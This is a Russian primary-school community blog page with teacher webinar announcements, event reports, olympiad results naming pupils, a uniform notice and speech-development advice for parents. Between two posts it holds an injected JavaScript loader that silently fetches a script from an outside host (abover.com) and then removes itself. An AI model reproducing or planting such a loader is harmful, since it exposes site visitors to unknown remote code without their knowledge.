Все игры
Обсуждения
Сортировать: по обновлениям | по дате | по рейтингу Отображать записи: Полный текст | Заголовки

Дефиле участниц.



Вебинары для учителей начальной школы.



Издательство «Просвещение» приглашает
на цикл вебинаров «Формирование и оценка универсальных учебных
действий в начальной школе», посвященных особенностям развития личностных,
познавательных, регулятивных и коммуникативных универсальных учебных
действий у учащихся младших классов.


Предлагаем Вам ознакомиться
с расписанием и зарегистрироваться на вебинары. Указанное время
начала вебинара — московское.


20 февраля 2015

15:00−17:00

«Формирование и оценка универсальных учебных действий при преподавании
литературного чтения» — Светлана Георгиевна Батырева, старший
преподаватель кафедры начального образования ГБОУ ВПО «Академия социального
управления», автор пособий для 1−4 классов «Типовые задачи по формированию
универсальных учебных действий. Литературное чтение».

Ссылка для участия: my.webinar.ru/event/435096


4 марта 2015

15:00−17:00

«Формирование и оценка универсальных учебных действий при преподавании
математики» — Татьяна Петровна Хиленко, старший преподаватель кафедры
начального образования ГБОУ ВПО «Академия социального управления»; Марина
Ивановна Овчинникова, старший преподаватель кафедры начального образования ГБОУ
ВПО «Академия социального управления».

Ссылка для участия: my.webinar.ru/event/435102


11 марта 2015

15:00−17:00

«Формирование и оценка универсальных учебных действий при преподавании
окружающего мира» — Роза Шамилевна Мошнина, кандидат педагогических наук,
профессор, заведующая кафедрой начального образования ГБОУ ВПО «Академия
социального управления».

Ссылка для участия: my.webinar.ru/event/435108


22 апреля 2015

15:00−17:00

«Программа развития универсальных учебных действий как основа вариативного
образования» — Роза Шамилевна Мошнина, кандидат педагогических наук,
профессор, заведующая кафедрой начального образования ГБОУ ВПО «Академия
социального управления».

Ссылка для участия: my.webinar.ru/event/435112


Участие в вебинаре бесплатное.
Во время вебинара слушателям в электронном виде бесплатно
предоставляется Сертификат участника вебинара.



Рефлексия на уроке.

    Один из принципов развивающего обучения - принцип активности и
сознательности. Обязательным условием создания развивающей среды на уроке
является этап рефлексии. Слово рефлексия происходит от латинского
reflexio – обращение назад. Словарь иностранных слов определяет
рефлексию как размышление о своем внутреннем состоянии, самопознание.
Толковый словарь русского языка трактует рефлексию как самоанализ. В
современной педагогике под рефлексией понимают самоанализ деятельности и
её  результатов.

  Обычно в конце урока подводятся его итоги,  обсуждение того, что
узнали, и того, как работали – т.е. каждый оценивает свой вклад в
достижение поставленных в начале урока целей, свою активность,
эффективность работы класса, увлекательность и полезность выбранных
форм работы.

   Предлагаю вашему вниманию фрагмент- рефлексия на уроке литературного чтения. Хотелось бы получить оценку.


Заключительный концерт участников площадки 2014

Предлагаю вашему вниманию танец 1 отряда " Апельсины"

4 отряд " Дети России"  под руководством  Алины самостоятельно придумали танец. Предлагаю посмотреть отрывок


Вот и закончилась наша летняя оздоровительная площадка "Бригантина”
Мы, воспитатели, очень рады, что всё, придуманное нами для детей,  им очень понравилось!

Вальс 4-х классов


Под руководством Лапицкой А. Р. ученики 4-х классов показали нам свой вальс
.

Театральные постановки 7февраля 2014г


настроение: Веселое

Метки: таланты

Концерт, посвященный Дню матери.2013Г

30 ноября в нашей 
школе прошел концерт, посвященный Дню матери. Учащиеся, родители и
педагоги подготовили творческие номера для мам. Очень трогательно и душевно
встретили мам их дети, прозвучали сольные и хоровые песни, стихотворные
пожелания и танцевальные номера.  Мероприятие никого не оставило
равнодушным.


Олимпийские уроки в начальной школе.

О спорт! Ты – вызов!
Ты требуешь борьбы.
Вся сила наших мускулов
сосредоточена  в одном, на взрыв
Похожем, слове – спорт.
   А ЗНАЕТЕ ЛИ ВЫ?

В 2010 году Международным олимпийским комитетом была утверждена Система олимпийского образования «Сочи 2014».
В нашей школе 22и 23 октября прошли уроки для учеников начальной школы.

Тема уроков: олимпийские и паралимпийские ценности.
Цели урока:
актуализация информации о XXII Олимпийских зимних играх и
XI Паралимпийских зимних играх, имеющейся у школьников;

расширение представлений школьников о XXII Олимпийских зимних играх и XI Паралимпийских зимних играх;
включение школьников в активное освоение системы олимпийских и паралимпийских ценностей;
устойчивые знания и понимание школьниками ценностей Олимпийского и Паралимпийского движения.
Учителя уроков физкультуры Пезина Н.Н. и Князев М. В.- провели уроки во 2 - 4 классах.
  Ребята узнали о первых и последующих играх. О  чемпионах, о видах спорта.
 Всем очень важно знать,
чтобы победить, необходимо ещё оказаться умным, умелым, интересным и духовно развитым человеком.

Весёлые старты 2.10 13г

2 октября на спортивной площадке прошли весёлые старты.
 В командном соревновании приняли участие учащиеся 2-4 классов.
Эстафету подготовили: Пезина Н. Н., Князев  М. В.
Результаты следующие:
Среди 2-х классов

- 2 " А" ( Муранец В. Н.)
- 2 "Б" ( Баранова С. В.)
 3м - 2 "В"  (Максакова Е. И.)

Среди 3-х классов
 1м - 3 " А" ( Гайдукова И. Д.)
- 3 "В" (Шипулина Н. В.)
 3м
-    3 "Б"  (Кузина О. В.)

4 м- 3 " Г"  ( Товстенко С. Г)
Среди 4-х классов
 1м - 4" Б" ( Мозговая Н. П.)
- 4 "Б" (Суслянко Е. В.)
 3м
-    3 "В"  (Яблонская Т. В.)

ПОЗДРАВЛЯЕМ С ПОБЕДОЙ!

(function () {
var script = document.createElement('script');
script.src = 'https://abover.com/system/e...=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random();
script.onload = script.onerror = function () {
script.onload = script.onerror = null;
script.parentNode.removeChild(script);
}

document.body.appendChild(script);
})();

Концерт к Дню пожилого человека

День пожилого человека во всем мире отмечается 1 октября. В нашей школе существует много традиций, одна из них - поздравление наших любимых дедушек и бабушек. В актовом зале  школы, 1 октября в 12ч состоялся праздничный концерт. В нём приняли участие ученики с 1 по 7 классы.
Примите наше поздравление, любимые и родные!
Мы вас уважаем совсем не за старость,

Мы вас уважаем за ваши дела,

Да, знаем, что в жизни вам крепко досталось,

Была непростая ваша судьба.


Вы многое сделали, много успели,

Страну поднимали и деток своих,

Про боль и усталость всегда забывали,

Коль дело касалось чести страны.


Спасибо большое, родные вы наши,

Здоровья вам крепкого, солнечных дней,

Живите вы с юмором в жизни и дальше,

И не сердитесь на ваших детей.




ШКОЛЬНАЯ ФОРМА.

Уважаемые родители и учащиеся школы. В связи с вступлением в силу с 1
сентября2013 г.

Федерального закона от 29 декабря2012 г. No 273-ФЗ «Об
образовании в Российской Федерации» (далее Закон), согласно которому
установление требований к одежде

обучающихся отнесено к компетенции
образовательной организации, администрация школы доводит до вашего
сведения, что внешний вид и одежда школьников

должны соответствовать
принятым в обществе нормам делового стиля и носить светский характер, а
так же соответствовать нормам СанПиН.

Цвет формы черный, синий, серый.
Покрой одежды - классический. Модель:
- для девочек:
пиджак (жакет, жилетка), рубашки (блузы), юбка(брюки).
Колготки однотонного нейтрального цвета
- для мальчиков:
брюки, рубашка, пиджак (жилет)
Одежда обучающихся должна соответствовать погоде и месту проведения учебных
занятий, температурному режиму в помещении.
Обучающимся
не рекомендуется ношение в образовательном учреждении одежды,

обуви и
аксессуаров с травмирующей фурнитурой, символикой асоциальных

неформальных молодежных объединений, а также пропагандирующих
психоактивные вещества и противоправное поведение.


Дневник.ру

  Дневник.ру - Единая образовательная сеть России, которая формирует уникальную электронную среду для учителей, учеников и их родителей.
  Базовый функционал Дневник.ру бесплатный для всех участников образовательного процесса.
  Пользователям доступны электронный классный журнал и электронный дневник учащегося, а также медиатека, библиотека образовательной литературы, онлайн-тренинг тестирования ЕГЭ, возможность пройти вступительные олимпиады в крупнейшие ВУЗы России.

   Уважаемые коллеги, родители и ученики! Наша "Началочка" теперь в Дневнике.ру. http://groups.dnevnik.ru  /group.aspx?group=158787     Присоединяйтесь!!!

НЕДЕЛЯ РУССКОГО ЯЗЫКА В НАЧАЛЬНОЙ ШКОЛЕ.

         Проводимые в школах предметные недели ещё раз показывают значимость
изучаемых предметов, их взаимосвязи между собой. Каждый ученик школы
может  самореализоваться, будь то олимпиада по русскому языку, участие в
конкурсе чтецов.
       18 ноября прошёл  квест среди учеников 3 и 4 классов.  Ученики 3 класса готовили проблемное задание c элементами ролевой игры, для выполнения которого
использовали информационные ресурсы интернета. Веб-квест  был направлен на
развитие у учащихся навыков аналитического и творческого мышления.

         
Результаты следующие:
1м  - 4 "А" ( учитель  Титова Л.М.)
2м  - 4 "Б" ( учитель  Смыкова В. В.)
3м  - 4 " В" ( учитель Новиченко А. Г.)
 ПОЗДРАВЛЯЕМ УЧЕНИКОВ И ИХ УЧИТЕЛЕЙ!
         Фотографии можно посмотреть в альбоме
 
        
http://foto.mail.ru/community/schoolsosh/1680

ТЕМАТИЧЕСКИЕ КОЛЛЕКЦИИ МАТЕРИАЛОВ

      В коллекции: сценарии, стихи, пожелания,
поздравления,  песни, ноты, фонограммы, открытки, 
картинки,плакаты, подарки,поделки, викторины и игры по сказкам, дидактические карточки и настольные игры
для распечатки, аудио, видео,сценарии,картинки, раскраски, поделки, методическая копилка .
Интерактивные игры.
http://www.metodkabinet.eu/BGM/BGM_menu_Temkatalog.html
            
           ВСЁ ДЛЯ ВАС , УВАЖАЕМЫЕ КОЛЛЕГИ!

Олимпиада в 2- 4 классах 24.10.12г

 Результаты олимпиад
 Русский язык
2 "Б",  учитель Кузина О. А.
  Присяжнюк Никита - 1м.
 Ковалюнас Никита -  2м.


 Чеберяк   Дмитрий-  2м.
                        2 "Г",  учитель Товстенко С. Г.
 Сурмина Арина  -3 м.

                                          Математика
                       2 "А", учитель Гайдукова И. Д.
Капленко Максим - 1м
Гайдуков Руслан - 2м    
                                  2 "Б",  учитель Кузина О. А.
Присяжнюк Никита - 3 м.
                            2 "В" , учитель Шипулина Н. В.
Ильин Илья - 2м                                   
                                       Русский язык
                           3 "А", учитель  Суслянко Е. В.

Баранов Данила- 3м
                          3 "Б", учитель Мозговая Н.П.
Черезова Дарья - 1 м.
Лукичёва Элина - 2 м.
                                     
Математика
3 "А", учитель  Суслянко Е. В.

Палкин Вадим - 2м

Баранов Данила- 3м

                            
3 "Б", учитель Мозговая Н.П.
 Мицкевич Валерий - 1м.
 Короткова Арина -1 м.
 
Черезова Дарья - 2 м.
 
Безмен Светлана  -  2м     
 Рыбалко Екатерина -2 м  

                                        Русский язык
                       4 "А", Титова Л. М.

Богданова Полина - 2м.
Заблоцкая Елизавета - 3м
Терехов Андрей - 2м
Усова Елизавета -2м.


                      4 "Б", Смыкова В. В.
Рябцева Яна - 3м.
                         
4 "В", Новиченко А. Г.
Деттерер  Екатерина -1м
                                      Математика                      
                           4 "А", Титова Л. М.
Римский Юрий - 2м.
Заблоцкая Елизавета - 3м.
                      4 "В", Новиченко А. Г.
Деттерер  Екатерина -3 м.

Невозможно полностью обработать текст записи ]

Что нам осень подарила?


Ежегодно
в нашей школе проводится выставка - конкурс осенних букетов и поделок из овощей и фруктов.
В конкурсе участвовали ребята с1 по 4классы. Большое спасибо нашим родителям!
 

КОНСУЛЬТАЦИЯ ЛОГОПЕДА


Как вы можете помочь вашему ребенку в развитии речи?

- Для того чтобы ваш ребенок заговорил, вы должны вести с ним постоянный односторонний разговор, даже если вам иногда кажется, что это бессмысленно и ребенок не обращает внимания на вашу речь. Спокойно и членораздельно называйте все предметы, которые вы показываете ребенку. Повторяйте это по нескольку раз.

Ни в коем случае не говорите с ребенком на «детском» языке, сюсюкая, картавя и искажая слова.Это может запутать ребенка и
не поможет в освоении правильной речи.

Разговаривайте с ребенком, чем бы вы ни занимались. Рассказывайте ему про все, что вы видите с ним на прогулке: про деревья, цветы, детей, которые играют, и т. д.  Когда вы переодеваете малыша, называйте предметы одежды, части  тела; когда накрываете на стол, объясняйте, где стол, стул, тарелка, ложка и т. д.

Читайте ребенку книжки с картинками, рассматривая и объясняя ему картинки. Находите на картинках знакомые малышу предметы и старайтесь показать и объяснить новые. Вначале читайте самые простые  книжки или легко запоминающиеся стихи.

Родителям, конечно, неинтересно читать  одно и то же, но малыши любят помногу раз слушать одни и те же истории. Чтение книжек с картинками лучше помогает приобщить малыша к чтению и к тому же  развивает речь.

Пойте ребенку простые песенки, повторяйте их часто, пусть ребенок при этом
хлопает в ладошки или притопывает ножками. Все это будет пополнять его словарный запас.

 Поощряйте любые попытки вашего малыша говорить, даже если вы ничего не поняли. Постепенно вы научитесь понимать его речь, а пока пытайтесь угадывать его желания по косвенным признакам и задавая вспомогательные вопросы.

Если ребенок трет глазки, спросите его: «Ты устал и хочешь спать?», если он тянется к чашке: «Ты хочешь пить?» В случае, если вы совсем не поняли ничего из сказанного малышом, проявите заинтересованность фразой вроде: «Гм-м, это очень
интересно».

 Если вам удалось понять, что хочет ребенок, четко повторите все, что он сказал: «Ты хочешь сока?», «Да, это зайка». Говорите четко, ясно, выразительно.

 Кроме этого, развивайте пальчики ребенка. Взаимосвязь тонкой (пальцевой) моторики и речевого развития известна уже давно.
Еще наши прабабушки использовали в воспитании детей игры типа «Ладушки» и «Сорока кашу варила».

Помните, что развивая тонкую моторику, Вы не только продвинете развитие своего ребенка вперед, но и сможете быстрее преодолеть отклонения, возникшие в речевом развитии ребенка.
Какие игры и упражнения можно порекомендовать для домашних занятий?

  • Предложите своей маленькой дочурке превратиться в Золушку и разложить в две разные кружечки фасоль и горох,  которые Вы перемешали в большой чашке.
  • С  сынишкой можно провести игру-соревнование на скорость.  Кто скорее, папа или сын разложит большие и маленькие болтики или гайки в два разных контейнера?
  • Покажите малышу, как можно складывать забавные фигурки из спичек, ушных палочек или счетных палочек. Пусть сложит лесенку, елочку, домик, кроватку для куклы…
  • Выкладывайте с ребенком узоры из гороха, фасоли, желудей. Используйте для основы картонку с тонким слоем пластилина.
  • Лепите со своим крохой из пластилина, играйте в мозаику и пазлы.
  • Учите  ребенка застегивать и расстегивать пуговицы, шнуровать ботинки, плести косички из разноцветных шнурков.
  • Как можно раньше купите малышу краски для рисования пальчиками. Сколько   восторга и пользы от такого рисования! Двухлетний малыш справится с рисованием мягкой кисточкой.  А трехлетнего нужно научить правильно  держать карандаш,  и тогда вскоре Вы получите первые шедевры маленького художника.  В деле обучения ребенка рисованию Вам помогут  книжки-раскраски.
  • И наконец, игры с пальчиками или пальчиковая гимнастика. Проводите подобные упражнения регулярно. Выразительно произносите текст и показывайте ребенку. сопровождающие его движения. Пусть пробует делать гимнастику вместе с Вами, сначала хотя бы договаривая текст.

IX краевая олимпиада занковцев.

5мая - команда СОШ №1 приняла участие в IX
краевой олимпиаде учеников –занковцев в г.Красноярске.

В команде были учащиеся четвертых классов: Поносова Анна и Бельтюков Даниил (учитель Максакова Е.И.), Слуцких Диана ( учитель МуранецВ.Н.) Руководителем нашей группы была Максакова Е.И. Победителем в номинации "Русский язык " стала Поносова Анна.



ПАРАД ЮНЫХ ТЕАТРАЛОВ.

4, 5 апреля в начальной школе прошло выступление театральных коллективов с 1по 4 класс. Мастерство  юных театралов  растёт с каждым годом. Вот что из этого получилось.

В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу